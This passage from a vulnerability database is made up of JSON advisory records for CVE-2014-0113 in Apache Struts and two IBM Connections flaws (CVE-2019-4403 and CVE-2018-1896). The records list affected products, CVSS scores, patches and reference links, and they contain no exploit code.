            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.4"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.1.3"
          },
          {
            "model": "struts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.13"
          },
          {
            "model": "keybox",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "skavanagh",
            "version": "2.10.03"
          },
          {
            "model": "ec2box",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "skavanagh",
            "version": "0.11.02"
          },
          {
            "model": "clearpass",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.3.2"
          },
          {
            "model": "clearpass",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.2.6"
          },
          {
            "model": "clearpass",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "arubanetworks",
            "version": "6.1.4"
          },
          {
            "model": "struts",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.3.16.2"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "67081"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002269"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-570"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0113"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:apache:struts",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:ibm:connections",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:oracle:mysql",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:esmpro_servermanager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:infocage",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:webotx",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:webotx_application_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:webotx_developer",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:nec:webotx_portal",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:integrated_system_ha_database_ready",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_application_development_cycle_manager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_application_framework_suite",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_application_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_apworks",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_business_application_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_job_workload_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_service_integrator",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:interstage_studio",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:serverview",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:symfoware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:systemwalker_service_catalog_manager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:systemwalker_service_quality_coordinator",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:systemwalker_software_configuration_manager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:triole",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:fujitsu:cloud_infrastructure_management_software",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002269"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Taki Uchiyama, Takeshi Terada, Takayoshi Isayama, Yoshiyuki Karezaki, BAKA/ty, \nShine, NSFOCUS Security Team and heige.",
        "sources": [
          {
            "db": "BID",
            "id": "67081"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2014-0113",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2014-0113",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2014-0113",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2014-0113",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201404-570",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2014-0113",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0113"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002269"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-570"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0113"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "CookieInterceptor in Apache Struts before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094. This vulnerability CVE-2014-0094 Vulnerability due to insufficient fix for.Through a crafted request by a third party, ClassLoader The \" operation (manipulate)\" And any code could be executed. Apache Struts is prone to a security-bypass vulnerability. \nAn attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. \nApache Struts versions 2.0.0 through 2.3.16.1 are vulnerable",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-0113"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002269"
          },
          {
            "db": "BID",
            "id": "67081"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-0113"
          }
        ],
        "trust": 1.98
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=33142",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0113"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2014-0113",
            "trust": 2.8
          },
          {
            "db": "SECUNIA",
            "id": "59178",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002269",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-570",
            "trust": 0.6
          },
          {
            "db": "BID",
            "id": "67081",
            "trust": 0.3
          },
          {
            "db": "EXPLOITDB",
            "id": "33142",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-0113",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0113"
          },
          {
            "db": "BID",
            "id": "67081"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002269"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-570"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0113"
          }
        ]
      },
      "id": "VAR-201404-0287",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.1875
      },
      "last_update_date": "2025-04-13T22:09:03.444000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Security Bulletins S2-021",
            "trust": 0.8,
            "url": "https://cwiki.apache.org/confluence/display/WW/S2-021"
          },
          {
            "title": "Download a Release of Apache Struts -- Full Releases Struts 2.3.16.2",
            "trust": 0.8,
            "url": "http://struts.apache.org/download.cgi#struts23162"
          },
          {
            "title": "1680848",
            "trust": 0.8,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680848"
          },
          {
            "title": "1681190",
            "trust": 0.8,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681190"
          },
          {
            "title": "NV15-001",
            "trust": 0.8,
            "url": "http://jpn.nec.com/security-info/secinfo/nv15-001.html"
          },
          {
            "title": "Text Form of Oracle Critical Patch Update - April 2015 Risk Matrices",
            "trust": 0.8,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015verbose-2365613.html"
          },
          {
            "title": "Oracle Critical Patch Update Advisory - April 2015",
            "trust": 0.8,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html"
          },
          {
            "title": "April 2015 Critical Patch Update Released",
            "trust": 0.8,
            "url": "https://blogs.oracle.com/security/entry/april_2015_critical_patch_update"
          },
          {
            "title": "CVE-2014-0094 \u4ed6 \u306b\u95a2\u3059\u308b\u5f71\u97ff",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/vulnerabilities/cve2014-0094-0114.html"
          },
          {
            "title": "Symfoware Server\uff08Open\u30a4\u30f3\u30bf\u30d5\u30a7\u30fc\u30b9\uff09: Struts\u306e\u8106\u5f31\u6027(CVE-2014-0094, CVE-2014-0112, CVE-2014-0113, CVE-2014-0116) (2014\u5e746\u67082\u65e5)",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/symfoware_201402.html"
          },
          {
            "title": "FUJITSU Integrated System HA Database Ready: Struts2\u306e\u8106\u5f31\u6027(CVE-2014-0094,CVE-2014-0112,CVE-2014-0113,CVE-2014-0116) (2014\u5e746\u670819\u65e5)",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/ha_db_ready_201401.html"
          },
          {
            "title": "struts-2.3.16.2-all",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49668"
          },
          {
            "title": "Red Hat: CVE-2014-0113",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2014-0113"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - April 2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4b527561ba1a5de7a529c8a93679f585"
          },
          {
            "title": "-maven-security-versions",
            "trust": 0.1,
            "url": "https://github.com/nagauker/-maven-security-versions "
          },
          {
            "title": "maven-security-versions-Travis",
            "trust": 0.1,
            "url": "https://github.com/klee94/maven-security-versions-Travis "
          },
          {
            "title": "maven-security-versions",
            "trust": 0.1,
            "url": "https://github.com/victims/maven-security-versions "
          },
          {
            "title": "victims",
            "trust": 0.1,
            "url": "https://github.com/tmpgit3000/victims "
          },
          {
            "title": "victims",
            "trust": 0.1,
            "url": "https://github.com/alexsh88/victims "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0113"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002269"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-570"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-264",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002269"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0113"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.0,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html"
          },
          {
            "trust": 2.0,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676706"
          },
          {
            "trust": 1.7,
            "url": "https://cwiki.apache.org/confluence/display/ww/s2-021"
          },
          {
            "trust": 1.7,
            "url": "http://secunia.com/advisories/59178"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/archive/1/531952/100/0/threaded"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0113"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0113"
          },
          {
            "trust": 0.3,
            "url": "http://www.arubanetworks.com/support/alerts/aid-051414.asc"
          },
          {
            "trust": 0.3,
            "url": "https://github.com/skavanagh/ec2box/releases/tag/v0.11.02"
          },
          {
            "trust": 0.3,
            "url": "https://github.com/skavanagh/keybox/releases/tag/v2.10.03"
          },
          {
            "trust": 0.3,
            "url": "http://struts.apache.org/"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21680848"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=isg3t1020896"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=isg3t1020893"
          },
          {
            "trust": 0.3,
            "url": "http://struts.apache.org/development/2.x/docs/s2-021.html"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=isg3t1020894"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=isg3t1020895"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/264.html"
          },
          {
            "trust": 0.1,
            "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=33975"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/victims/maven-security-versions"
          },
          {
            "trust": 0.1,
            "url": "https://www.exploit-db.com/exploits/33142/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0113"
          },
          {
            "db": "BID",
            "id": "67081"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002269"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-570"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0113"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0113"
          },
          {
            "db": "BID",
            "id": "67081"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002269"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-570"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0113"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2014-04-29T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-0113"
          },
          {
            "date": "2014-04-28T00:00:00",
            "db": "BID",
            "id": "67081"
          },
          {
            "date": "2014-04-30T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-002269"
          },
          {
            "date": "2014-04-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201404-570"
          },
          {
            "date": "2014-04-29T10:37:03.700000",
            "db": "NVD",
            "id": "CVE-2014-0113"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-08-12T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-0113"
          },
          {
            "date": "2015-05-07T17:38:00",
            "db": "BID",
            "id": "67081"
          },
          {
            "date": "2016-08-02T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-002269"
          },
          {
            "date": "2019-08-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201404-570"
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2014-0113"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-570"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Apache Struts of  CookieInterceptor In  ClassLoader Vulnerability manipulated",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-002269"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "permissions and access control issues",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201404-570"
          }
        ],
        "trust": 0.6
      }
    }

    CVE-2019-4403 (GCVE-0-2019-4403)

    Vulnerability from nvd – Published: 2019-06-14 14:45 – Updated: 2024-09-17 00:46
    VLAI
    Summary
    IBM Connections 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 162264.
    CWE
    • Cross-Site Scripting
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 6.0
    Create a notification for this product.
    Date Public
    2019-06-12 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-04T19:33:38.289Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://www.ibm.com/support/docview.wss?uid=ibm10886079"
              },
              {
                "name": "ibm-connections-cve20194403-xss (162264)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/162264"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "6.0"
                }
              ]
            }
          ],
          "datePublic": "2019-06-12T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 162264."
            }
          ],
          "metrics": [
            {
              "cvssV3_0": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 5.4,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitCodeMaturity": "HIGH",
                "integrityImpact": "LOW",
                "privilegesRequired": "LOW",
                "remediationLevel": "OFFICIAL_FIX",
                "reportConfidence": "CONFIRMED",
                "scope": "CHANGED",
                "temporalScore": 5.2,
                "temporalSeverity": "MEDIUM",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/PR:L/S:C/A:N/I:L/AV:N/C:L/AC:L/UI:R/RL:O/E:H/RC:C",
                "version": "3.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Cross-Site Scripting",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2019-06-14T14:45:18.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://www.ibm.com/support/docview.wss?uid=ibm10886079"
            },
            {
              "name": "ibm-connections-cve20194403-xss (162264)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/162264"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2019-06-12T00:00:00",
              "ID": "CVE-2019-4403",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "6.0"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 162264."
                }
              ]
            },
            "impact": {
              "cvssv3": {
                "BM": {
                  "A": "N",
                  "AC": "L",
                  "AV": "N",
                  "C": "L",
                  "I": "L",
                  "PR": "L",
                  "S": "C",
                  "UI": "R"
                },
                "TM": {
                  "E": "H",
                  "RC": "C",
                  "RL": "O"
                }
              }
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Cross-Site Scripting"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://www.ibm.com/support/docview.wss?uid=ibm10886079",
                  "refsource": "CONFIRM",
                  "title": "IBM Security Bulletin 886079 (Connections)",
                  "url": "https://www.ibm.com/support/docview.wss?uid=ibm10886079"
                },
                {
                  "name": "ibm-connections-cve20194403-xss (162264)",
                  "refsource": "XF",
                  "title": "X-Force Vulnerability Report",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/162264"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2019-4403",
        "datePublished": "2019-06-14T14:45:18.106Z",
        "dateReserved": "2019-01-03T00:00:00.000Z",
        "dateUpdated": "2024-09-17T00:46:24.965Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-1896 (GCVE-0-2018-1896)

    Vulnerability from nvd – Published: 2018-12-07 16:00 – Updated: 2024-09-16 22:25
    VLAI
    Summary
    IBM Connections 5.0, 5.5, and 6.0 is vulnerable to possible host header injection attack that could cause navigation to the attacker's domain. IBM X-Force ID: 152456.
    CWE
    • Gain Access
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 5.0
    Affected: 5.5
    Affected: 6.0
    Create a notification for this product.
    Date Public
    2018-12-05 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T04:14:38.748Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "ibm-connections-cve20181896-head-injection(152456)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/152456"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://www.ibm.com/support/docview.wss?uid=ibm10742567"
              },
              {
                "name": "106197",
                "tags": [
                  "vdb-entry",
                  "x_refsource_BID",
                  "x_transferred"
                ],
                "url": "http://www.securityfocus.com/bid/106197"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "5.0"
                },
                {
                  "status": "affected",
                  "version": "5.5"
                },
                {
                  "status": "affected",
                  "version": "6.0"
                }
              ]
            }
          ],
          "datePublic": "2018-12-05T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections 5.0, 5.5, and 6.0 is vulnerable to possible host header injection attack that could cause navigation to the attacker\u0027s domain. IBM X-Force ID: 152456."
            }
          ],
          "metrics": [
            {
              "cvssV3_0": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 4.6,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitCodeMaturity": "UNPROVEN",
                "integrityImpact": "LOW",
                "privilegesRequired": "LOW",
                "remediationLevel": "OFFICIAL_FIX",
                "reportConfidence": "CONFIRMED",
                "scope": "UNCHANGED",
                "temporalScore": 4,
                "temporalSeverity": "MEDIUM",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/A:N/AC:L/AV:N/C:L/I:L/PR:L/S:U/UI:R/E:U/RC:C/RL:O",
                "version": "3.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Gain Access",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-12-14T10:57:02.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "name": "ibm-connections-cve20181896-head-injection(152456)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/152456"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://www.ibm.com/support/docview.wss?uid=ibm10742567"
            },
            {
              "name": "106197",
              "tags": [
                "vdb-entry",
                "x_refsource_BID"
              ],
              "url": "http://www.securityfocus.com/bid/106197"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2018-12-05T00:00:00",
              "ID": "CVE-2018-1896",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "5.0"
                              },
                              {
                                "version_value": "5.5"
                              },
                              {
                                "version_value": "6.0"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
